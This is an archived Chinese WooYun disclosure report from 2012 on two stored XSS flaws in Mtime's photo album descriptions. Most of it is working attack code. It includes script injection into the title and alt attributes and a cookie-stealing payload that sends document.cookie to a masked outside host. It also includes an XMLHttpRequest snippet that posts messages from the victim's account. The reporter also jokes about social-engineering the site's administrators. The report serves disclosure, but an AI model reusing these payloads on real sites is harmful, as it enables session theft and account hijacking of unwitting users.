乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2012-08-29: 细节已通知厂商并且等待厂商处理中 2012-09-03: 厂商已经主动忽略漏洞,细节向公众公开
时光网两个存储Xss。希望有礼物。
http://my.mtime.com/app/album/ 相册发布照片吧。
咋们去添加描述.
两个地方Xss DOM。。。http://i.mtime.com/6912275/tag/photo/xss.htmlhttp://i.mtime.com/6912275/photo/6359464/代码都转义鸟,应该是innerHTML了。
<a href="http://i.mtime.com/6912275/photo/6359464/" title="<script>alert(/xss1/)</script>"><img src="http://img32.mtime.cn/up/2012/08/29/132120.28194126_160X160.jpg" alt="<script>alert(/xss1/)</script>"></a>
我们来盗盗COOKIES 玩玩?
<script/src=//xxxxx/uploads/c.js>
document.write('<iframe id="rc" width="0" height="0"></iframe><script>document.getElementById("rc").src="http://xxxxxxxxxx/uploads/c.php?c="+document.cookie;</script>');
(已经邮件和短信去社工管理员ing。。。)也来推销下吧。
http://service.mtime.com/Service/Twitter.msi?Ajax_CallBack=true&Ajax_CallBackType=Mtime.Service.Pages.TwitterService&Ajax_CallBackMethod=PostTweetCrossDomainByFlash&Ajax_CrossDomain=1&Ajax_RequestUrl=http%3A%2F%2Fmy.mtime.com%2F&t=20128291344973966&Ajax_CallBackArgument0=HJMJJ%20for%20wooyun%20&Ajax_CallBackArgument1=&Ajax_CallBackArgument2=0&Ajax_CallBackArgument3=1&Ajax_CallBackArgument4=0&Ajax_CallBackArgument5=0&Ajax_CallBackArgument6=0&Ajax_CallBackArgument7=0
var request = false;if(window.XMLHttpRequest) {request = new XMLHttpRequest();if(request.overrideMimeType) {request.overrideMimeType('text/xml');}} else if(window.ActiveXObject) {var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];for(var i=0; i<versions.length; i++) {try {request = new ActiveXObject(versions[i]);} catch(e) {}}}xmlhttp=request; ajax(); function ajax(){var url="http://service.mtime.com/Service/Twitter.msi?Ajax_CallBack=true&Ajax_CallBackType=Mtime.Service.Pages.TwitterService&Ajax_CallBackMethod=PostTweetCrossDomainByFlash&Ajax_CrossDomain=1&Ajax_RequestUrl=http%3A%2F%2Fmy.mtime.com%2F&t=20128291344973966&Ajax_CallBackArgument0=HJMJJ%20for%20wooyun%20&Ajax_CallBackArgument1=&Ajax_CallBackArgument2=0&Ajax_CallBackArgument3=1&Ajax_CallBackArgument4=0&Ajax_CallBackArgument5=0&Ajax_CallBackArgument6=0&Ajax_CallBackArgument7=0"; //请求地址xmlhttp.open("get", url, true);}
短小而精悍。
见详细说明.
&# \/ 这些也转义吧~
危害等级:无影响厂商忽略
忽略时间:2012-09-03 14:07
暂无